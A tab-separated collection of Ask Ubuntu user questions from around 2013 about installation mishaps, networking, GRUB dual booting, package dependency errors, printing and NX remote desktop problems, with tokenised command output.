347146	lost around 200 gb of hd space after installing ubuntu	i have installed ubuntu about an hour ago , and during the installation i took some horrible steps which accordingly resulted in a terrible conclusion . i knew what i was doing . i just wanted to install ubuntu over my windows 7 , completely replacing it . first i booted with a usb , selected install ubuntu option , then selected replace windows , and then next , and then i clicked on the install button . without another word , the installation started immediately . and shortly after then a message box popped over my screen and just told me that i am doomed now ( `` the entire disk will be used for install '' or something like that.. ) . and suddenly i noticed that there was a little orange line of text saying `` advanced partition options '' at the lower middle portion of the screen . i thought clicking the install button will automatically bring me to the partition menu . but sadly that did n't happen . well , you see it was too late . i even tried to interrupt it by restarting during the installation . but after restart , i realized that the damage is done . all the previous partitions are gone . so i completed my installation by partitioning my hd ( 250 gb ) as 2.00 gb for swap and 50.00 gb for linux . and after the installation , guess what ? there is no trace of that 198.00 gb hd space . all there is is the file system ( which says 255 mb volume ) and the home ( the 50 gb one i guess ) . frankly speaking , i am a complete noob at os installation ( except windows ) . so i have no idea of what exactly has happened with my hd . i tried sudo fdisk -l it gives me this as output . disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0001c5a7 device boot start end blocks id system /dev/sda1 2048 499711 248832 83 linux /dev/sda2 * 499712 98156543 48828416 83 linux /dev/sda3 98156544 102062079 1952768 82 linux swap / solaris finally my question -- is there a way to fix all these , i mean can i get my old partitions back ? if not the partitions , can i at least have the data which were in the hd before before ubuntu installation ? please , i ca n't lose them , i have kept those in my hd for almost 5-6 years . how to view the hd through file system or something like that ? its like the entire 200 gb has gone missing . i ca n't find them anywhere . lastly , thanks in advance . edit : this is the gparted version of my current partitions . now can you please tell me how can i use that unallocated space ?
347147	unable to reach internet with ping , so ca n't get automatic updates	i do n't think the version matters in this case , but 13.04 64-bit . connecting wirelessly through a router . in fighting a losing battle to attempt to get remote printing working to a windows xp ( windows only printer ) xerox docuprint p8 ( which still is n't working , but that 's not my concern here ) , i changed a number of files , including /etc/hosts , now i have come to discover that something i changed makes it impossible for me to reach any hosts ( via ping ) , install any new software , and i am unable get automatic updates , or even ping askubuntu.com . browsing through chromium or ff works fine , but from shell level , things are broken . : ( done some searching through askubuntu.com , but unable to find an answer to this . thank you in advance . route | grep default default anothernet 0.0.0.0 ug 0 0 0 wlan0 ifconfig -a eth0 link encap : ethernet hwaddr 00:1e:68:52:87:9e up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:566 errors:0 dropped:0 overruns:0 frame:0 tx packets:566 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:51199 ( 51.1 kb ) tx bytes:51199 ( 51.1 kb ) wlan0 link encap : ethernet hwaddr 00:21:5c:21:78 : d1 inet addr:192.168.1.141 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :221:5cff : fe21:78d1/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:5314 errors:0 dropped:0 overruns:0 frame:0 tx packets:5252 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:3838126 ( 3.8 mb ) tx bytes:957386 ( 957.3 kb ) ip addr 1 : lo : < loopback , up , lower_up > mtu 65536 qdisc noqueue state unknown link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo inet6 : :1/128 scope host 1 : lo : < loopback , up , lower_up > mtu 65536 qdisc noqueue state unknown link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo inet6 : :1/128 scope host valid_lft forever preferred_lft forever 2 : eth0 : < no-carrier , broadcast , multicast , up > mtu 1500 qdisc pfifo_fast state down qlen 1000 link/ether 00:1e:68:52:87:9e brd ff : ff : ff : ff : ff : ff 3 : wlan0 : < broadcast , multicast , up , lower_up > mtu 1500 qdisc mq state up qlen 1000 link/ether 00:21:5c:21:78 : d1 brd ff : ff : ff : ff : ff : ff inet 192.168.1.141/24 brd 192.168.1.255 scope global wlan0 inet6 fe80 : :221:5cff : fe21:78d1/64 scope link valid_lft forever preferred_lft forever iwconfig eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11abgn essid : '' anothernet '' mode : managed frequency:2.462 ghz access point : 20 : aa:4b:8e : ae:5a bit rate=72.2 mb/s tx-power=14 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : off link quality=42/70 signal level=-68 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:1057 invalid misc:118 missed beacon:0 iptables -l chain input ( policy accept ) target prot opt source destination chain forward ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination nm-tool networkmanager tool state : connected ( global ) - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : r8169 state : unavailable default : no hw address : 00:1e:68:52:87:9e capabilities : carrier detect : yes wired properties carrier : off state : unavailable default : no hw address : 00:1e:68:52:87:9e capabilities : carrier detect : yes wired properties carrier : off - device : wlan0 [ anothernet ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : iwl4965 state : connected default : yes hw address : 00:21:5c:21:78 : d1 capabilities : speed : 72 mb/s wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points ( * = current ap ) $ cat /etc/hosts 127.0.0.1 localhost loopback 192.168.1.141 hpdv6700 linux jl 192.168.1.115 reggiedesktop reggiedesktop reggiedesktop printserver rd 192.168.1.1 gateway gw router ea2700 # the following lines are desirable for ipv6 capable hosts : :1 ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters $ ping 192.168.1.140 ping 192.168.1.140 ( 192.168.1.140 ) 56 ( 84 ) bytes of data . from 192.168.1.141 icmp_seq=1 destination host unreachable from 192.168.1.141 icmp_seq=2 destination host unreachable from 192.168.1.141 icmp_seq=3 destination host unreachable from 192.168.1.141 icmp_seq=4 destination host unreachable from 192.168.1.141 icmp_seq=5 destination host unreachable from 192.168.1.141 icmp_seq=6 destination host unreachable from 192.168.1.141 icmp_seq=7 destination host unreachable from 192.168.1.141 icmp_seq=8 destination host unreachable from 192.168.1.141 icmp_seq=9 destination host unreachable ^c -- - 192.168.1.140 ping statistics -- - 11 packets transmitted , 0 received , +9 errors , 100 % packet loss , time 10056ms pipe 3 $ ping 192.168.1.1 ping 192.168.1.1 ( 192.168.1.1 ) 56 ( 84 ) bytes of data . 64 bytes from 192.168.1.1 : icmp_req=1 ttl=64 time=7.82 ms 64 bytes from 192.168.1.1 : icmp_req=2 ttl=64 time=9.02 ms 64 bytes from 192.168.1.1 : icmp_req=3 ttl=64 time=1.39 ms 64 bytes from 192.168.1.1 : icmp_req=4 ttl=64 time=6.47 ms ^c -- - 192.168.1.1 ping statistics -- - 4 packets transmitted , 4 received , 0 % packet loss , time 3003ms rtt min/avg/max/mdev = 1.394/6.178/9.022/2.905 ms ping of askubuntu.com never returns , just sits there .
347149	i ca n't open dvds in vlc whenever i suspend my system , why ?	i know there are a lot of similar questions out there , so i hope not to get the same answer i 've already read a couple times . i know that dcd playback does not work with stock vlc ; you have to install the restricted extras . so far so good , i did that and everything works fine . but : i tend to suspend my computer , rather than fully shutting it down , because i do n't like waiting that much . i also use a program to do timed suspends ( qshutdown ) , so i can fall asleep watching a dvd and not have to worry about a running computer . you maybe wondering why i 'm telling this ? here you are : almost every time , i wake my computer from suspend , i ca n't open dvds in vlc ( it works , if i open it without dvd menus , but then it crashes somewhere in the middle of the film ) . is there a known solution to it ?
347150	canon lbp5360 printing multiple pages	i have ubuntu 12.04 running on a toshiba satellite pro l870x . i am trying to print to a canon lpbp5360 network printer using cups . up until recently this was working fine . now ( over the past 2 or 3 weeks ) every time that i try to print something it prints out multiple copies until i stop the printer and flush its print queue . this happens even though i ensure that print only 1 copy is chosen/selected . i have tried this in chrome , open office writer and open office calc all with the same problem so i do n't believe that it is an application issue . i have un-installing and re-installing the printer in cups . i have removed and re-installed cups and then added the printer again but without any improvement . does anyone have any ideas or suggestions ? thanks
347151	how to download files uploaded to `` proposed '' repository ?	let 's take this as an example : https : //bugs.launchpad.net/ubuntu/+source/virtualbox/+bug/1076603 in post # 19 the poster said : sru request : please accept virtualbox_4.1.12-dfsg-2ubuntu0.4 in precise-proposed . it only contains patches to support kernels up to 3.11 . now where can i get this proposed package manually by fetching via curl/wget ? important : i do not have a working installation of ubuntu 12.04 . all i have is a working debian os . and i do not want to mess with the installation if i do n't have to .
347152	why is the /etc/hosts file not working ?	i have been having problems with this for a while and have tried everything i know , so i figured it was finally time to ask for some help . any edit i make to /etc/hosts just does n't work . example : julian @ ifrit : ~ $ cat /etc/hosts 127.0.0.1 localhost 127.0.1.1 ifrit 192.168.1.100 dev.julianfernand.es in the example above , when i access dev.julianfernand.es ( this does n't exist ) , it should load from 192.168.1.100 . if i ping , it works just fine . however when i access dev.julianfernand.es using google chrome or firefox , it does n't . now , after i restart a couple times , it works . but since i work at a managed wordpress hosting company , i deal with many situations where i have to edit my file to see the customer 's website on our server . i just ca n't keep restarting my computer . it is n't productive at all . restarting the networking service does n't work , same for clearing cache ( even internal chrome dns cache ) . does anyone have an idea here ? this happens with elementaryos ( based on ubuntu 12.04 ) and ubuntu 13.10 ( daily ) . have n't tried with any other version yet . ps : if this matter , i have a nginx server running on this machine with php-fpm and mysql . thanks in advance : )
347155	nvidia 319.32 does n't work with optimus	i have installed ubuntu 12.04.3 ( 3.8.030 ) and i have a gt630m card and i installed nvidia 319.32 from additional drivers and restarted . but when i used bumblebee with 12.04.2 , i used to see 40-45 celsius , but now it 's 55-70 degrees . i guess optimus is not active . what can i do to fix this issue ?
347156	how to free drive space of a computer without an operating system using ubuntu running in a usb stick ?	i can run ubuntu 12.04 from a usb stick . but i need 4.4 gb of drive space to install ubuntu . when i turn the computer on , it shows the massage : operating system not found . how can i free some space in this drive to install ubuntu ? ( this computer was given to me this way )
347157	problems booting into windows 8 after installing ubuntu 13.04	i just attempted to set up my lenovo thinkpad twist to dual boot . it had windows 8.1 pre-installed . i burned ubuntu 13.04 to a usb and booted from that . i partitioned the drives allocating 50 gb for the ubuntu partition . ubuntu itself works fine , however when i try to boot back into windows i get an error : ca n't find command 'drivemap ' and error : invalid efi file path . it looks like the problem is that the partition created 4 separate file systems : lenovo_recovery 367mb volume windows8_os winre_drv . there is a boot folder under the windows8_os file system , but i think that it is not being accessed by the boot menu . also , the boot menu only has an option for windows 8 ( loader ) ( on/dev/sda4 ) and no windows recovery environment . the parameters for this file are as follows : setparams 'windows 8 ( loader ) ( on /dev/sda4 ) ' insmod part_gpt insmod ntfs set root='hd0 , gpt4' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-efi=hd0 , gpt4 -- hit-baremetal=ahci0 , gpt4 fe3a79de3a79947d else search -- no-floppy -- fs-uuid -- set=froot fe3a79de3a79947d fi drivemap -s ( hd0 ) $ { root } chainloader +1 how do i fix this so that i can boot back into windows 8 ?
347159	`` service ssh restart '' causes server to encounter kernel panic	i just got my hdd 's in my servers raid controller replaced with intel 520 ssd 's . now after reinstalling the server ( with ubuntu server 12.04 and with a newer kernel 3.8.0-29-generic ) and installing and configuring all the software i need ( redis , postgresql etc . ) , then it gives me the following immediately after running service ssh restart : i haved tried to debug the whole process step by step , followed by running service ssh restartafter each installation/config step , but i can not seem to narrow/track down the source of the issue , it only occurs after installing everything . any idea what might cause this , and how i can solve it ?
347161	grub2 on usb with ubuntu and windows 8 recovery	i have a surface pro . i have moved my recovery partition off of the surface pro onto a usb flash drive . i have also installed grub2 on the flash drive with ubuntu live/persistent ( i backed up the surface pro recovery stuff first ! ! ) . i am trying to get a grub2 config that will let me boot from the harddrive , boot into the windows 8 recovery for the surface pro , and all the ubuntu stuff . i have the all the linux grub stuff working , i am just having trouble getting the windows 8 grub stuff working . i have tried using chainloader , but i am not exactly sure how . it seems efi changed everything i thought i knew about grub . also , i do not know how to get proper names of the usb and surface ssd for grub . here is a screencap of the file structure on the usb : here is a screencap of the output of ls in the grub command line . here is my grub2 config so far : if loadfont /boot/grub/font.pf2 ; then set gfxmode=auto insmod efi_gop insmod efi_uga insmod gfxterm terminal_output gfxterm fi set menu_color_normal=white/black set menu_color_highlight=black/light-gray menuentry `` boot from harddrive '' { // this one does not work set root= ( hd0,1 ) chainloader ( hd0,1 ) } menuentry `` ubuntu 13.04 persistent '' { set gfxpayload=keep linux /casper/vmlinuz.efi persistent file=/cdrom/preseed/ubuntu.seed boot=casper quiet splash -- initrd /casper/initrd.lz } menuentry `` ubuntu 13.04 live '' { set gfxpayload=keep linux /casper/vmlinuz.efi file=/cdrom/preseed/ubuntu.seed boot=casper quiet splash -- initrd /casper/initrd.lz } menuentry `` install ubuntu 13.04 '' { set gfxpayload=keep linux /casper/vmlinuz.efi file=/cdrom/preseed/ubuntu.seed boot=casper only-ubiquity quiet splash -- initrd /casper/initrd.lz } menuentry `` file integrity check '' { set gfxpayload=keep linux /casper/vmlinuz.efi boot=casper integrity-check quiet splash -- initrd /casper/initrd.lz } menuentry `` memory test '' { set gfxpayload=keep linux /casper/mt86plus } now if you ask why the hell am i doing this , mostly it is for trying to learn more about grub and understanding it , but also , if i get it working , i will have a usb that i can use for ubuntu whenever i want and it still doubles as my recovery for my surface . if all goes well , i am thinking about even installing ubuntu on my surface for a dual boot . here is a screencap of my storage config of my surface :
347166	system info - bash script	i am attempting to pull rx packets , cpu vendor and model along with cpu mhz . here is my script : # ! /bin/bash # systemstat case $ 1= '' -r '' count='ifconfig eth0 | grep 'rx packets : ' | cut -d : -f2 | awk ' { print $ 1 } '' date='date + '' % h : % m : % s '' ' echo `` time '' $ '\t ' $ '\t ' `` total packets eth0 '' echo $ date $ '\t ' $ '\t ' $ count ; ; `` -c '' vendor='cat /proc/cpuinfo | grep 'vendor_id ' | cut -d : -f2 | awk ' { print $ 1 } '' model='cat /proc/cpuinfo |grep 'model name ' | cut -d : -f2 ' cpu='more /proc/cpuinfo | grep 'cpu mhz ' | cut -d : $ * ) echo ; ; esac i am getting the following error : ./systemstat : line 6 : syntax error near unexpected token `count='ifconfig eth0 | grep 'rx' ./systemstat : line 6 : `count='ifconfig eth0 | grep 'rx packets : ' | cut -d : -f2 | awk ' { print $ 1 } '' ' can anyone assist ? thank you !
347167	how can i fix ubuntu 12.04 lts not detecting windows 8 while installing ?	i 'm a newbie here and i apologize for posting this question inspite of there being numerous people with the same problem who 've posted similar questions . i ca n't seem to understand what to do . i 'm installing ubuntu from a bootable usb drive . after pressing f12 while startup and choosing the usb drive , i see the ubuntu desktop . when i proceed to install ubuntu it says : `` no os was detected , do you want to erase everything on your drive and install ubuntu '' or `` something else '' . of course i do n't want to erase everything because it 'll remove windows 8 as well . i 'm trying to install ubuntu on the efi mode . my windows 8 is installed in the uefi mode as well . please help !
347169	installing ubuntu 12.04 on windows xp 32 bit	every time i start the ubuntu 12.04 installation on my 32-bit windows xp using the windows installer wubi , the installation gets stagnant at a particular point , and the installation bar does n't move for like another half hour , what could be the possible issue , and please help me out with an alternative solution as well .
347171	hgsubversion , mercurial ( ppa ) : broken dependencies	i have installed mercurial from the ppa , then i wanted to install hgsubversion . that fails due to unmet dependencies . but they are met , as far as i understand . what am i missing here ? jb @ x60 ~ $ apt-cache policy mercurial mercurial : installed : 2.7-0ppa1 candidate : 2.7-0ppa1 version table : *** 2.7-0ppa1 0 500 http : //ppa.launchpad.net/mercurial-ppa/releases/ubuntu/ raring/main i386 packages 100 /var/lib/dpkg/status 2.2.2-2 0 500 http : //ftp.tu-chemnitz.de/pub/linux/ubuntu/ raring/universe i386 packages jb @ x60 ~ $ sudo apt-get install hgsubversion reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : hgsubversion : depends : mercurial ( > = 1.9.1-1~ ) but it is not going to be installed e : unable to correct problems , you have held broken packages . other info : jb @ x60 ~ $ lsb_release -a no lsb modules are available . distributor id : linuxmint description : linux mint 15 olivia release : 15 codename : olivia
347176	multiple problems with my dell inspiron 15r se 7520	i 'm having some problems with my dell inspiron 15r se 7520 laptop . i hope you can help me with this . i searched a lot , but found no working solutions . specs : amd radeon hd 7730m + intel hd 4000 128 gig samsung ssd 1 tb hdd intelâž coreâ˘ i5-3210m cpu 8 gig ram ubuntu 13.04 64-bit problems : hotkey ( fn + f4 and f5 ) to change screen brightness does not work battery lasts a lot less long than in windows fan is spinning way too much and too loud . sensors say cpu temp is +- 60 c , although this is higher than usual . gpu is +-50 c. i do n't even need the amd radeon hd 7730m . can i disable this one completely ? i also installed no extra drivers .
347180	x forwarding and multiple languages ?	i have x forwarding up and running - the problem is that i want to use japanese and korean characters , while currently my forwarded x apps have only english inputs . how do i setup x forwarding to use languages other than english ? i know how to install input methods ( ibus , scim , nabi .. ) on linux , but i have no experience over installing those on servers without any graphic environments .
347182	how to make backspace work in google chrome	my girl friend has just switched to ubuntu on her laptop ( yay ! ) , but she complains about backspace not going back in history in google chrome . i know that in firefox you can change the behaviour ( pressing backspace does n't open previous page in firefox ) , but she uses chrome ( ! ) . is there something that can be done to restore the behaviour to chrome ?
347183	flash player : sound distorted	when playing videos in flash player the sound gets distorted . but it only happens when i switch to full screen mode . the flash player plugin is up to date and the issue occurs on both firefox and chromium . i 'm running ubuntu 12.04 lts . here 's the list of the sound devices : **** list of playback hardware devices **** card 0 : intel [ hda intel ] , device 0 : alc262 analog [ alc262 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : intel [ hda intel ] , device 1 : alc262 digital [ alc262 digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 any help would be appreciated . edit : also videos stop playing randomly sometimes . i always have to hit refresh in order to for the video to continue playing .
347184	how to redirect all requests within a wlan using ad-hoc to a specific address or hostname	i 'm setting up an ubuntu embedded system as a `` master '' server which will then broadcast to clients using ad-hoc in a wlan . the purpose is for a client to access the wlan and then access a webapp on my local network . but instead of having then going to my ip address or my hostname.local i want then to be redirected from all requests to the my hostname.local address in order for them to only access my webapp and nothing else . searching on the forum , i found dnsmasq although i 'm not sure if this would work for me seeing as i need all requests * to be redirected . any ideas ? regards
347186	does rhythmbox have any command line interface or method of interprocess communication ?	i 'd really like to communicate with rhythmbox with a web server so i can remotely change the music playing from my smartphone . is there a command-line interface for rhythmbox to do things like rhythmbox next or rhythmbox shuffle=false or rhythmbox change album='dark side of the moon ' artist='pink floyd ' song='time ' ? is there a socet or message-passing interface instead ? are there any substitute programs that could get the job done , like banshee , or some other type of server ? any help would be awesome ! thank you !
347189	formatted volume group in need of recover ( test disk doesnt seem to cut it )	first of all , my bad if i placed this question on the wrong forum but i am working on ubuntu so it is relevant . so here it goes . i while ago ( like 6 months ago ) i decided i would try out windows server 2012 on my server . to my surprise ( back then it was a surprise ) i could n't locate my raid5 array ( or so i thought it was ) . i did some investigation and i stumbled upon the fact that windows could n't handle ext4 partitions . the little problem solver in me thought , well there probably is some sort of converter to convert my partition to ntfs or something . this turned out to be fruitless . however while exploring the wonderful features of windows server 2012 . i stumbled upon what i thought , at the time , was a conversion tool from microsoft themselves . how wonderful ! so without researching what it actually did i clicked the button . thus it started with what i thought was the conversion . until , i noticed a little thing , it was a text that read : `` formatting disk '' . luckily i was watching the progress-bar while it was doing the `` conversion '' , so i noticed it immediately . however the cancel button was grayed out . in my panic i just blatantly pressed the power button of the server . afterwards i set about trying to solve my problem . in my stupidity i removed my volume group during a reinstall of ubuntu . this turned out to make things worse . so far for the introduction . now here is the pickle . normally i would go about trying to solve this on my own . and thus-far i 've gotten quite far . using testdisk and several other partition recovery/creation/edit programs i pretty much figured out what the problem is . however i do n't know how to solve it . this is where ( hopefully ) you come in . problem breakdown formatted a volume group removed the volume group via boot-able ubuntu usb device helpful information os : ubuntu 12.10 os-type : 64-bit number of disks : 3 disk names : `` /dev/sda '' , `` /dev/sdb '' , `` /dev/sdc '' disk sizes : 2tb ( all 3 have this size ) disks partition types : ext4 volume group : yes volume group name : raid5 my two cents what i think is going on is the following . i 'm under the impression that i 've somehow created a loop of sorts . this is why i 'm under this impression . the problem disk is `` /dev/sdc '' . when i go to analyse with testdisk i get `` bad gpt partition , invalid signature '' . the other two disks give me the following when i analyse `` linux lvm '' . which is what it is supposed to be . when i do a quick search on the bad disk it finds an `` ms data '' partition ( for which i do n't know what it is , is it the microsoft partition ? ) . my guess however is that it is not the correct partition as the other two read `` linux lvm '' . though testdisk reads the following at the bottom of the console : `` ext4 large file sparse superblock backup superblock , 2000 gb / 1863 gib '' . which is correct . the other two however both read `` lvm2 , 2000 gb / 1863 gib '' after a deeper search . which would be correct . as they are part of a volume group which was an lvm2 . now i tried restoring the vg but that did n't work as sdc has a broken partition table ( and here is the part where it loops ) . i tried restoring the partition table but that wo n't work because ( well i think it 's the reason at least ) it ca n't find the raid5 vg . i 'm currently running a deeper search on sdc to see if i can find the lvm2 partition . though i think it was n't listed the last time . so ... got milk ? no just joking . if anyone has an idea how to fix this do tell me . if you need any further information tell me as well iäşl do my best trying to provide it . rope .
347190	dependency problem prevent upgrade	after falling into a root disk full issue due to the automatic updates installing new kernel with removing of old ones , i am now facing a dependency issue that prevent any upgrade of my system . the sudo apt-get -f install command ends with the following error : dpkg : dependency problems prevent configuration of linux-image-virtual : linux-image-virtual depends on linux-image-3.2.0-52-virtual ; however : package linux-image-3.2.0-52-virtual is not installed . dpkg : error processing linux-image-virtual ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . dpkg : dependency problems prevent configuration of linux-virtual : linux-virtual depends on linux-image-virtual ( = 3.2.0.52.62 ) ; however : package linux-image-virtual is not configured yet . linux-virtual depends on linux-headers-virtual ( = 3.2.0.52.62 ) ; however : version of linux-headers-virtual on system is 3.2.0.53.63. dpkg : error processing linux-virtual ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : linux-image-virtual linux-virtual e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i have read several time another questions that seems to be very similar to my case but i was unable to solve my problem . if i understand correctly the output below it seems that in my case the linux-headers-virtual package has an higher version that the linux-image-virtual extract of the output of the dpkg -l command : ii linux-headers-3.2.0-52 3.2.0-52.78 header files related to linux kernel version 3.2.0 ii linux-headers-3.2.0-52-generic 3.2.0-52.78 linux kernel headers for version 3.2.0 on 64 bit x86 smp ii linux-headers-3.2.0-52-virtual 3.2.0-52.78 linux kernel headers for version 3.2.0 on 64 bit x86 virtual guests ii linux-headers-3.2.0-53 3.2.0-53.81 header files related to linux kernel version 3.2.0 ii linux-headers-3.2.0-53-virtual 3.2.0-53.81 linux kernel headers for version 3.2.0 on 64 bit x86 virtual guests ii linux-headers-generic 3.2.0.52.62 generic linux kernel headers ii linux-headers-virtual 3.2.0.53.63 linux kernel headers for virtual machines ii linux-image-3.2.0-44-generic 3.2.0-44.69 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-44-virtual 3.2.0-44.69 linux kernel image for version 3.2.0 on 64 bit x86 virtual guests ii linux-image-3.2.0-45-generic 3.2.0-45.70 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-45-virtual 3.2.0-45.70 linux kernel image for version 3.2.0 on 64 bit x86 virtual guests ii linux-image-3.2.0-48-generic 3.2.0-48.74 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-48-virtual 3.2.0-48.74 linux kernel image for version 3.2.0 on 64 bit x86 virtual guests ii linux-image-3.2.0-51-generic 3.2.0-51.77 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-51-virtual 3.2.0-51.77 linux kernel image for version 3.2.0 on 64 bit x86 virtual guests ii linux-image-3.2.0-52-generic 3.2.0-52.78 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-53-virtual 3.2.0-53.81 linux kernel image for version 3.2.0 on 64 bit x86 virtual guests ii linux-image-generic 3.2.0.52.62 generic linux kernel image iu linux-image-virtual 3.2.0.52.62 linux kernel image for virtual machines iu linux-virtual 3.2.0.52.62 complete linux kernel for virtual machines output of df -h ( after resizing the root partition ) : filesystem size used avail use % mounted on /dev/xvda2 22g 961m 20g 5 % / udev 111m 8.0k 111m 1 % /dev tmpfs 48m 212k 48m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 120m 0 120m 0 % /run/shm /dev/xvda1 461m 194m 244m 45 % /boot /dev/mapper/main-main -- var 4.6g 339m 4.1g 8 % /var /dev/mapper/main-main -- usr 4.6g 1.1g 3.3g 25 % /usr /dev/mapper/main-main -- home 1.4g 35m 1.3g 3 % /home /dev/mapper/main-main -- tmp 1.4g 35m 1.3g 3 % /tmp /dev/mapper/main-main -- var -- -- lib 2.8g 303m 2.4g 12 % /var/lib output of df -i filesystem inodes iused ifree iuse % mounted on /dev/xvda2 1320336 28766 1291570 3 % / udev 28362 433 27929 2 % /dev tmpfs 30546 336 30210 2 % /run none 30546 4 30542 1 % /run/lock none 30546 1 30545 1 % /run/shm /dev/xvda1 121920 276 121644 1 % /boot /dev/mapper/main-main -- var 305216 460 304756 1 % /var /dev/mapper/main-main -- usr 305216 197641 107575 65 % /usr /dev/mapper/main-main -- home 91392 21 91371 1 % /home /dev/mapper/main-main -- tmp 91776 11 91765 1 % /tmp /dev/mapper/main-main -- var -- -- lib 183264 4540 178724 3 % /var/lib uname -r output : 3.2.0-44-virtual dpkg -- print-architecture output amd64 any help will highly appreciated . thanks in advance .
347191	how to install gnome 3.8 on ubuntu 13.04	i 'm new to this ubuntu 13.04 so can any one help me installing gnome 3.8 on my ubuntu 13.04 clearly step-by-step please .
347193	connect with nx client from windows	i 'm having troubles , hooking my nx client up to my nx server . i get this : nx > 203 nxssh running with pid : 1128 nx > 285 enabling check on switch command nx > 285 enabling skip of ssh config files nx > 285 setting the preferred nx options nx > 200 connected to address : 192.168.2.3 on port : 22 nx > 202 authenticating user : nx nx > 208 using auth method : publickey welcome to ubuntu 12.04.3 lts ( gnu/linux 3.2.0-51-generic x86_64 ) * documentation : https : //help.ubuntu.com/ hello nxserver - version 3.2.0-74-svn os ( gpl , using backend : 3.5.0 ) nx > 105 hello nxclient - version 3.2.0 nx > 134 accepted protocol : 3.2.0 nx > 105 set shell_mode shell nx > 105 set auth_mode password nx > 105 login nx > 101 user : reg nx > 102 password : nx > 103 welcome to : desktopoffice user : reg nx > 105 listsession -- user= '' reg '' -- status= '' suspended , running '' -- geometry= '' 1920x1080x32+render '' -- type= '' unix-kde '' nx > 127 sessions list of user 'reg ' for reconnect : display type session id options depth screen status session name -- -- -- - -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - -- -- -- -- -- -- -- -- -- -- -- -- - -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- nx > 148 server capacity : not reached for user : reg nx > 105 startsession -- link= '' lan '' -- backingstore= '' 1 '' -- encryption= '' 1 '' -- cache= '' 16m '' -- images= '' 64m '' -- shmem= '' 1 '' -- shpix= '' 1 '' -- strict= '' 0 '' -- composite= '' 1 '' -- media= '' 0 '' -- session= '' test '' -- type= '' unix-kde '' -- geometry= '' 1914x1012 '' -- client= '' winnt '' -- keyboard= '' pc105/en_us '' -- screeninfo= '' 1914x1012x32+render '' nx > 1000 nxnode - version 3.2.0-74-svn os ( gpl , using backend : 3.5.0 ) nx > 700 session id : desktopoffice -- nx > 705 session display : nx > 703 session type : nx > 701 proxy cookie : 9e4eaf5de11a2614612fe35cbdf995ec nx > 702 proxy ip : 127.0.0.1 nx > 706 agent cookie : 9e4eaf5de11a2614612fe35cbdf995ec nx > 704 session cache : nx > 707 ssl tunneling : 0 nx > 105 nx > 596 session startup failed . nx > 1004 error : nx agent exited with exit status 1 . to troubleshoot set session_log_clean=0 in node.conf and investigate `` /home/reg/.nx/f-c-desktopoffice -- /session '' . you might also want to try : ssh -x myserver ; /usr/lib/nx/nxnode -- agent to test the basic functionality . session log follows : ca n't open /var/lib/nxserver/db/running/sessionid { 93e6404ad2453b56889c0fa6eff2bc91 } : no such file or directory . mv : can not stat `/var/lib/nxserver/db/running/sessionid { 93e6404ad2453b56889c0fa6eff2bc91 } ' : no such file or directory nx > 1006 session status : closed nx > 280 exiting on signal : 15 and then i tried this on my localhost : $ ssh -x localhost ; /usr/lib/nx/nxnode -- agent reg @ localhost 's password : welcome to ubuntu 12.04.3 lts ( gnu/linux 3.2.0-51-generic x86_64 ) * documentation : https : //help.ubuntu.com/ last login : wed sep 18 11:09:42 2013 from localhost reg @ desktopoffice : ~ $ exit logout connection to localhost closed . nx > 1000 nxnode - version 3.2.0-74-svn os ( gpl , using backend : 3.5.0 ) nx > 716 starting nx agent ... error : aborting session with 'server is already active for display 0 if this server is no longer running , remove /tmp/.x0-lock and start again ' . session : aborting session at 'wed sep 18 11:10:33 2013 ' . session : session aborted at 'wed sep 18 11:10:33 2013 